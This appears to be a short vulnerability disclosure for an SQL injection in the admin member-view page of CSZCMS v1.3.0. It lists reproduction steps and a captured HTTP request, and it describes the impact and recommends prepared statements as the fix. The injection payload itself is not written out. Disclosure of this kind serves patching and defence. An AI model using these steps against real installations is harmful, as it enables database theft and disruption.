# Title: CSZCMS v1.3.0 - SQL Injection  
# Author: Abdulaziz Almetairy  
# Date: 27/01/2024  
# Vendor:  
# Software:  
# Reference:  
# Tested on: Windows 11, MySQL, Apache  
# 1 - Log in to the admin portal  
# 2 - Navigate to General Menu > Member Users.  
# 3 Click the 'View' button next to any username.  
# 4 Intercept the request  
GET /cszcms/admin/members/view/1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss  
Upgrade-Insecure-Requests: 1  
# 5 Modify the paramter   
and url encode all characters  
Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.  
Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.